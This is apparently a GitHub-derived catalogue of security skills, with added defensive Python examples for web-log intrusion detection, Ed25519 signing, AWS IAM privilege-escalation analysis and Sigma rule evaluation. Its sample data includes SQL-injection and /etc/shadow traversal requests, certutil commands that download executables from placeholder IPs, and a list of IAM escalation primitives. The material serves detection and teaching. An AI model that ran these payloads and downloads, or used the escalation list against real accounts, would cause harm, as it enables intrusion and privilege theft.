GitHub
Skills harvested from GitHub repositories
14810 skills available
performing-endpoint-vulnerability-remediation
Use this skill when: Remediating vulnerabilities identified by scanners (Nessus, Qualys, Rapid7); Responding to zero-day ...
performing-lateral-movement-detection
Use this skill when: SOC teams need to detect attackers pivoting between systems after initial compromise; Incident inves...
detecting-deepfake-audio-in-vishing-attacks
A suspected vishing call used an AI-cloned executive voice to authorize a wire transfer; Security operations received a v...
scanning-network-with-nmap-advanced
Performing comprehensive asset discovery across large enterprise networks during authorized assessments; Enumerating serv...
implementing-mitre-attack-coverage-mapping
MITRE ATT&CK coverage mapping gives SOC teams a structured, adversary-centric lens to evaluate detection capabilities. E...
implementing-mimecast-targeted-attack-protection
Mimecast Targeted Threat Protection (TTP) is a suite of advanced email security services designed to protect against sop...
conducting-api-security-testing
Testing API endpoints for authorization flaws, injection vulnerabilities, and business logic bypasses; Assessing the secu...
implementing-github-advanced-security-for-code-scanning
GitHub Advanced Security (GHAS) integrates CodeQL-powered static application security testing directly into the GitHub d...
conducting-post-incident-lessons-learned
After any security incident has been fully resolved and recovery completed; Following tabletop exercises or IR simulation...
analyzing-ransomware-encryption-mechanisms
A ransomware infection has occurred and recovery requires understanding the encryption scheme used; Assessing whether dec...
building-identity-federation-with-saml-azure-ad
Identity federation enables users authenticated by one identity provider to access resources managed by another without ...
analyzing-web-server-logs-for-intrusion
When investigating security incidents that require analyzing web server logs for intrusion; When building detection rules...
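As an added example (not part of the skill listing or its source repository), the following Python runs a handful of intrusion checks over constructed combined-format web server log lines: URL-decoded SQL injection and path traversal patterns in the request path, known scanner User-Agents, and a per-client brute-force threshold on authentication failures followed by a success. The sample lines, IPs and thresholds are all made up for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample traffic in Apache/Nginx "combined" log format; none of it is real.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:13:55:38 +0000] "GET /products?id=1%27%20OR%201%3D1-- HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [10/Mar/2024:13:56:01 +0000] "GET /../../../../etc/passwd HTTP/1.1" 404 162 "-" "curl/8.0"
198.51.100.23 - - [10/Mar/2024:13:56:02 +0000] "GET /static/%2e%2e/%2e%2e/etc/shadow HTTP/1.1" 403 153 "-" "curl/8.0"
192.0.2.55 - - [10/Mar/2024:13:57:10 +0000] "POST /login HTTP/1.1" 401 77 "-" "python-requests/2.31"
192.0.2.55 - - [10/Mar/2024:13:57:11 +0000] "POST /login HTTP/1.1" 401 77 "-" "python-requests/2.31"
192.0.2.55 - - [10/Mar/2024:13:57:12 +0000] "POST /login HTTP/1.1" 401 77 "-" "python-requests/2.31"
192.0.2.55 - - [10/Mar/2024:13:57:13 +0000] "POST /login HTTP/1.1" 401 77 "-" "python-requests/2.31"
192.0.2.55 - - [10/Mar/2024:13:57:14 +0000] "POST /login HTTP/1.1" 401 77 "-" "python-requests/2.31"
192.0.2.55 - - [10/Mar/2024:13:57:15 +0000] "POST /login HTTP/1.1" 302 0 "-" "python-requests/2.31"
10.0.0.4 - - [10/Mar/2024:13:58:00 +0000] "GET /admin HTTP/1.1" 200 800 "-" "Nikto/2.1.6"
"""

# Combined log format: ip ident user [time] "METHOD path PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Deliberately coarse signatures: tautology, UNION SELECT, trailing comment markers.
SQLI_RE = re.compile(r"('|\")\s*(or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+|union\s+select|--\s*$|/\*", re.I)
TRAVERSAL_RE = re.compile(r"(\.\./|\.\.\\)")
SCANNER_UA_MARKERS = ("nikto", "sqlmap", "nmap", "masscan", "acunetix")
AUTH_FAILURE_THRESHOLD = 5   # failures per (client, path) before it is called brute force


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode twice so double-encoded traversal (%252e%252e) is caught as well as %2e%2e.
    rec["decoded_path"] = unquote(unquote(rec["path"]))
    return rec


def analyze(log_text):
    """Return a list of findings, each {"kind", "ip", "detail"}, in log order."""
    findings = []
    failures = defaultdict(int)   # (ip, raw path) -> count of 401/403 responses
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            findings.append({"kind": "unparsed", "ip": None, "detail": line})
            continue
        ip, path = rec["ip"], rec["decoded_path"]
        if SQLI_RE.search(path):
            findings.append({"kind": "sqli", "ip": ip, "detail": path})
        if TRAVERSAL_RE.search(path):
            findings.append({"kind": "traversal", "ip": ip, "detail": path})
        if any(marker in rec["ua"].lower() for marker in SCANNER_UA_MARKERS):
            findings.append({"kind": "scanner_ua", "ip": ip, "detail": rec["ua"]})
        key = (ip, rec["path"])
        if rec["status"] in (401, 403):
            failures[key] += 1
            if failures[key] == AUTH_FAILURE_THRESHOLD:   # report once, when the threshold is hit
                findings.append({"kind": "brute_force", "ip": ip,
                                 "detail": f"{failures[key]} auth failures on {rec['path']}"})
        elif rec["method"] == "POST" and rec["status"] in (200, 302) \
                and failures[key] >= AUTH_FAILURE_THRESHOLD:
            # A success right after a burst of failures is the case worth paging on.
            findings.append({"kind": "brute_force_success", "ip": ip,
                             "detail": f"{rec['status']} after {failures[key]} failures on {rec['path']}"})
    return findings


def summarize(findings):
    """Count findings per kind, handy as a quick triage table."""
    return dict(Counter(f["kind"] for f in findings))


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['kind']:<20} {f['ip'] or '-':<15} {f['detail']}")
```

The path is decoded before matching because attackers routinely encode the quote or the dot-dot sequence; matching the raw request string would miss the third and fourth sample lines. Thresholds and signatures here are illustrative; in production they belong in a detection rule with tuning per application.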
implementing-digital-signatures-with-ed25519
Ed25519 is a high-performance digital signature algorithm using the twisted Edwards curve edwards25519, which is birationally equivalent to Curve25519. It provides 128-bit securi...
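As an added example, not taken from the skill or its repository, here is a textbook Ed25519 key derivation, signing and verification in plain Python following RFC 8032, checked against the RFC's first test vector (empty message). It uses affine arithmetic with a field inversion per addition and branches on secret bits, so it is for understanding the algorithm only; real systems should use libsodium, PyNaCl or the `cryptography` package. The one check worth noticing is the rejection of a non-canonical S (S >= L), which is what stops the trivial signature-malleability trick.

```python
import hashlib

# edwards25519 parameters as in RFC 8032. Textbook implementation: not constant time,
# not for real keys.
P = 2**255 - 19                                          # field prime
L = 2**252 + 27742317777372353535851937790883648493      # order of the base point
D = (-121665 * pow(121666, P - 2, P)) % P                # curve constant d = -121665/121666
SQRT_M1 = pow(2, (P - 1) // 4, P)                        # a square root of -1 mod P


def inv(x):
    return pow(x, P - 2, P)


def sha512(*parts):
    return hashlib.sha512(b"".join(parts)).digest()


def x_recover(y):
    """Even x with x^2 = (y^2 - 1) / (d y^2 + 1); the caller applies the sign bit."""
    xx = (y * y - 1) * inv(D * y * y + 1)
    x = pow(xx, (P + 3) // 8, P)
    if (x * x - xx) % P != 0:
        x = (x * SQRT_M1) % P
    return x if x % 2 == 0 else P - x


def add(p1, p2):
    """Twisted Edwards addition in affine coordinates (two field inversions per add)."""
    x1, y1 = p1
    x2, y2 = p2
    x3 = (x1 * y2 + x2 * y1) * inv(1 + D * x1 * x2 * y1 * y2)
    y3 = (y1 * y2 + x1 * x2) * inv(1 - D * x1 * x2 * y1 * y2)
    return (x3 % P, y3 % P)


def scalar_mult(point, k):
    """Left-to-right double-and-add; it branches on key bits, hence not side-channel safe."""
    acc = (0, 1)                       # the neutral element
    for bit in bin(k)[2:]:
        acc = add(acc, acc)
        if bit == "1":
            acc = add(acc, point)
    return acc


BASE_Y = (4 * inv(5)) % P
BASE = (x_recover(BASE_Y), BASE_Y)     # generator B


def encode_point(point):
    x, y = point
    return (y | ((x & 1) << 255)).to_bytes(32, "little")   # y plus sign(x) in the top bit


def decode_point(data):
    y = int.from_bytes(data, "little") & ((1 << 255) - 1)
    x = x_recover(y)
    if (x & 1) != (data[31] >> 7):
        x = P - x
    if (-x * x + y * y - 1 - D * x * x * y * y) % P != 0:
        raise ValueError("point is not on edwards25519")
    return (x, y)


def clamp(h):
    """Secret scalar derivation: clear the low 3 bits and bit 255, set bit 254."""
    a = int.from_bytes(h[:32], "little")
    return (a & ~7 & ((1 << 254) - 1)) | (1 << 254)


def public_key(sk):
    return encode_point(scalar_mult(BASE, clamp(sha512(sk))))


def sign(message, sk):
    h = sha512(sk)
    a = clamp(h)
    pk = encode_point(scalar_mult(BASE, a))
    r = int.from_bytes(sha512(h[32:], message), "little") % L   # deterministic nonce
    R = encode_point(scalar_mult(BASE, r))
    k = int.from_bytes(sha512(R, pk, message), "little")
    S = (r + k * a) % L
    return R + S.to_bytes(32, "little")


def verify(signature, message, pk):
    if len(signature) != 64 or len(pk) != 32:
        return False
    try:
        R = decode_point(signature[:32])
        A = decode_point(pk)
    except ValueError:
        return False
    S = int.from_bytes(signature[32:], "little")
    if S >= L:   # RFC 8032 requires canonical S; this also blocks trivial malleability
        return False
    k = int.from_bytes(sha512(signature[:32], pk, message), "little")
    return scalar_mult(BASE, S) == add(R, scalar_mult(A, k))


def demo():
    """Round trip on RFC 8032 test vector 1 (empty message) plus two rejection cases."""
    sk = bytes.fromhex("9d61b19deffd5a60ba844af492ec2cc44449c5697b326919703bac031cae7f60")
    pk = public_key(sk)
    sig = sign(b"", sk)
    malleated = sig[:32] + (int.from_bytes(sig[32:], "little") + L).to_bytes(32, "little")
    return {"pk": pk.hex(), "sig": sig.hex(), "valid": verify(sig, b"", pk),
            "tampered_message": verify(sig, b"tampered", pk),
            "noncanonical_s": verify(malleated, b"", pk)}


if __name__ == "__main__":
    print(demo())
```

The nonce r is derived from the second half of SHA-512(sk) and the message rather than from a random generator, which is why Ed25519 has no nonce-reuse failure mode of the kind that broke ECDSA deployments; the price is that the private key must never be used with two different prehash or context conventions.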
performing-network-packet-capture-analysis
Network packet captures (PCAP/PCAPNG files) represent the ultimate source of truth about network activity and provide ir...
deobfuscating-javascript-malware
Investigating a phishing page with obfuscated JavaScript that performs credential harvesting or redirect; Analyzing a web...
performing-cloud-asset-inventory-with-cartography
Cartography is a CNCF sandbox project (originally created at Lyft) that consolidates infrastructure assets and their rel...
detecting-aws-iam-privilege-escalation
This skill uses boto3 and Cloudsplaining-style analysis to identify IAM privilege escalation paths in AWS accounts. It d...
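The following is an added example, not code from the skill or from Cloudsplaining, showing the core of that style of analysis on constructed policy documents: expand the principal's Allow statements with IAM's wildcard matching, let explicit Deny win, surface Condition blocks, and then test the resulting action set against a list of known escalation primitives (the combinations documented by Rhino Security Labs and checked by Cloudsplaining and PMapper). In a real assessment the documents would come from boto3's `get_account_authorization_details` call; here they are inline, and the account ID, role names and policies are invented.

```python
import fnmatch

# Escalation primitives: each set of actions, held together, lets a principal grant
# itself more rights. This is a subset of the published list, enough for the example.
ESCALATION_PATHS = {
    "CreatePolicyVersion": {"iam:CreatePolicyVersion"},
    "SetDefaultPolicyVersion": {"iam:SetDefaultPolicyVersion"},
    "AttachUserPolicy": {"iam:AttachUserPolicy"},
    "AttachRolePolicy": {"iam:AttachRolePolicy"},
    "PutUserPolicy": {"iam:PutUserPolicy"},
    "PutRolePolicy": {"iam:PutRolePolicy"},
    "AddUserToGroup": {"iam:AddUserToGroup"},
    "CreateAccessKey": {"iam:CreateAccessKey"},
    "CreateLoginProfile": {"iam:CreateLoginProfile"},
    "UpdateLoginProfile": {"iam:UpdateLoginProfile"},
    "UpdateAssumeRolePolicy+AssumeRole": {"iam:UpdateAssumeRolePolicy", "sts:AssumeRole"},
    "PassRole+CreateFunction+InvokeFunction": {"iam:PassRole", "lambda:CreateFunction",
                                              "lambda:InvokeFunction"},
    "PassRole+RunInstances": {"iam:PassRole", "ec2:RunInstances"},
    "PassRole+CreateStack": {"iam:PassRole", "cloudformation:CreateStack"},
    "UpdateFunctionCode": {"lambda:UpdateFunctionCode"},
}

# Constructed documents for a hypothetical "developer" principal (account ID is fictional).
DEVELOPER_POLICIES = [
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["lambda:*", "logs:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/lambda-*"},
        {"Effect": "Allow", "Action": "iam:Get*", "Resource": "*"},
    ]},
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Deny", "Action": "lambda:UpdateFunctionCode", "Resource": "*"},
    ]},
]

# Same principal after least-privilege cleanup: no CreateFunction, PassRole scoped by condition.
HARDENED_POLICIES = [
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Resource": "*",
         "Action": ["lambda:InvokeFunction", "lambda:GetFunction", "lambda:ListFunctions", "logs:*"]},
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:aws:iam::123456789012:role/lambda-*",
         "Condition": {"StringEquals": {"iam:PassedToService": "lambda.amazonaws.com"}}},
    ]},
]


def as_list(value):
    return value if isinstance(value, list) else [value]


def statement_covers(stmt, action):
    """IAM action matching: case-insensitive, '*' wildcards, NotAction inverts the list."""
    action = action.lower()
    if "Action" in stmt:
        return any(fnmatch.fnmatchcase(action, p.lower()) for p in as_list(stmt["Action"]))
    if "NotAction" in stmt:
        return not any(fnmatch.fnmatchcase(action, p.lower()) for p in as_list(stmt["NotAction"]))
    return False


def effective_actions(policies, candidates):
    """Map each allowed candidate action to the resources it is allowed on.

    Explicit Deny wins regardless of statement order. Conditions are not evaluated
    (that needs request context); actions gated by one are reported separately.
    """
    allows, denies, conditional = {}, set(), set()
    for doc in policies:
        for stmt in as_list(doc["Statement"]):
            for action in candidates:
                if not statement_covers(stmt, action):
                    continue
                if stmt.get("Effect") == "Deny":
                    denies.add(action)
                elif stmt.get("Effect") == "Allow":
                    allows.setdefault(action, set()).update(as_list(stmt.get("Resource", "*")))
                    if stmt.get("Condition"):
                        conditional.add(action)
    return {a: r for a, r in allows.items() if a not in denies}, conditional - denies


def find_escalation_paths(policies):
    """Return every escalation primitive whose full action set the principal holds."""
    candidates = set().union(*ESCALATION_PATHS.values())
    allowed, conditional = effective_actions(policies, candidates)
    findings = []
    for name, needed in sorted(ESCALATION_PATHS.items()):
        if needed <= set(allowed):
            findings.append({"path": name,
                             "conditional": bool(needed & conditional),
                             "resources": {a: sorted(allowed[a]) for a in sorted(needed)}})
    return findings


if __name__ == "__main__":
    for finding in find_escalation_paths(DEVELOPER_POLICIES):
        print(finding)
    print("hardened:", find_escalation_paths(HARDENED_POLICIES))
```

The developer policy looks harmless on its face, but `lambda:*` plus a scoped `iam:PassRole` is enough to run code as any `lambda-*` role, so the finding carries the resource ARNs for the reviewer to check which of those roles are privileged. Resource scoping and conditions reduce exposure but rarely remove it, which is why the output flags them rather than suppressing the path.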
analyzing-pdf-malware-with-pdfid
A suspicious PDF attachment has been flagged by email security or reported by a user; You need to determine if a PDF cont...
performing-hash-cracking-with-hashcat
Hash cracking is an essential skill for penetration testers and security auditors to evaluate password strength. Hashcat...
analyzing-powershell-empire-artifacts
PowerShell Empire is a post-exploitation framework consisting of listeners, stagers, and agents. Its artifacts leave det...
triaging-security-alerts-in-splunk
Use this skill when: SOC Tier 1 analysts need to process the Incident Review queue in Splunk Enterprise Security (ES); No...
implementing-ot-network-traffic-analysis-with-nozomi
When deploying passive OT network monitoring using Nozomi Networks Guardian sensors; When requiring asset visibility with...
implementing-mobile-application-management
Use this skill when: Deploying enterprise mobile app protection without full device management (MDM); Implementing BYOD p...
building-detection-rules-with-sigma
Use this skill when: SOC engineers need to create detection rules portable across multiple SIEM platforms; Threat intelli...
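As an added example, not part of the skill or of the Sigma project, the block below shows what makes a Sigma rule portable: the rule is plain data (here the dict PyYAML would produce from the YAML), and a small evaluator applies its `contains`/`endswith`/`all` modifiers and its `selection and not filter` condition to constructed process-creation events, while a second function renders the same rule as a Splunk search the way a pySigma backend would (much simplified, no field mapping, map-style selections only). The certutil rule, the internal mirror URL and the events are all made up for the example.

```python
# A Sigma rule as the dict PyYAML would load from the YAML file (constructed for this example).
RULE = {
    "title": "Certutil download via URL cache",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": "\\certutil.exe",
            "CommandLine|contains|all": ["urlcache", "http"],
        },
        "filter_internal": {   # hypothetical internal patch mirror, tuned out as a known-good source
            "CommandLine|contains": "http://updates.corp.example/",
        },
        "condition": "selection and not filter_internal",
    },
    "level": "high",
}

# Constructed process-creation events (Sysmon EventID 1 style); not real telemetry.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.9/a.exe a.exe"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -f http://updates.corp.example/patch.msi patch.msi"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -hashfile a.exe SHA256"},
    {"Image": "C:\\Tools\\Certutil.EXE",
     "CommandLine": "CertUtil.EXE -URLCache -split -f https://198.51.100.4/x.dll x.dll"},
]


def _field_matches(event, field_spec, expected):
    """Apply Sigma value modifiers (contains/endswith/startswith, all) case-insensitively."""
    name, *mods = field_spec.split("|")
    if name not in event:
        return False
    actual = str(event[name]).lower()
    values = [str(v).lower() for v in (expected if isinstance(expected, list) else [expected])]
    tests = {"contains": lambda v: v in actual, "endswith": actual.endswith,
             "startswith": actual.startswith}
    test = next((tests[m] for m in mods if m in tests), lambda v: actual == v)
    combine = all if "all" in mods else any          # list values are OR unless |all
    return combine(test(v) for v in values)


def _selection_matches(event, selection):
    """A selection is a map (all fields must match) or a list of maps (any map may match)."""
    maps = selection if isinstance(selection, list) else [selection]
    return any(all(_field_matches(event, f, v) for f, v in m.items()) for m in maps)


def _tokens(condition):
    return condition.replace("(", " ( ").replace(")", " ) ").split()


def _eval_condition(tokens, values):
    """Recursive-descent evaluator for conditions built from and / or / not / parentheses."""
    pos = 0

    def parse_or():
        nonlocal pos
        result = parse_and()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            result = parse_and() or result
        return result

    def parse_and():
        nonlocal pos
        result = parse_not()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            result = parse_not() and result
        return result

    def parse_not():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "not":
            return not parse_not()
        if tok == "(":
            inner = parse_or()
            pos += 1                                 # consume ')'
            return inner
        return values[tok]

    return parse_or()


def rule_matches(rule, event):
    det = rule["detection"]
    values = {k: _selection_matches(event, v) for k, v in det.items() if k != "condition"}
    return _eval_condition(_tokens(det["condition"]), values)


def match_events(rule, events):
    return [i for i, e in enumerate(events) if rule_matches(rule, e)]


def to_splunk(rule):
    """Render the rule as a Splunk search (simplified pySigma-style backend)."""
    def term(spec, expected):
        name, *mods = spec.split("|")
        values = expected if isinstance(expected, list) else [expected]
        pat = "{}"
        for mod, template in (("contains", "*{}*"), ("endswith", "*{}"), ("startswith", "{}*")):
            if mod in mods:
                pat = template
        parts = [f'{name}="{pat.format(v)}"' for v in values]
        glue = " AND " if "all" in mods else " OR "
        return parts[0] if len(parts) == 1 else "(" + glue.join(parts) + ")"

    det = rule["detection"]
    rendered = {k: "(" + " AND ".join(term(f, v) for f, v in sel.items()) + ")"
                for k, sel in det.items() if k != "condition"}
    words = {"and": "AND", "or": "OR", "not": "NOT"}
    return " ".join(words.get(t, rendered.get(t, t)) for t in _tokens(det["condition"]))


if __name__ == "__main__":
    print("matching events:", match_events(RULE, EVENTS))
    print("splunk:", to_splunk(RULE))
```

Two things the evaluator gets right that hand-written SIEM queries often miss: matching is case-insensitive (the fourth event uses `CertUtil.EXE -URLCache` and still fires), and the filter is applied as `not filter`, so an event that hits the selection but also the internal mirror is suppressed rather than double-counted. Real deployments should use the `sigma-cli`/pySigma converters, which also handle field mappings and the full modifier set.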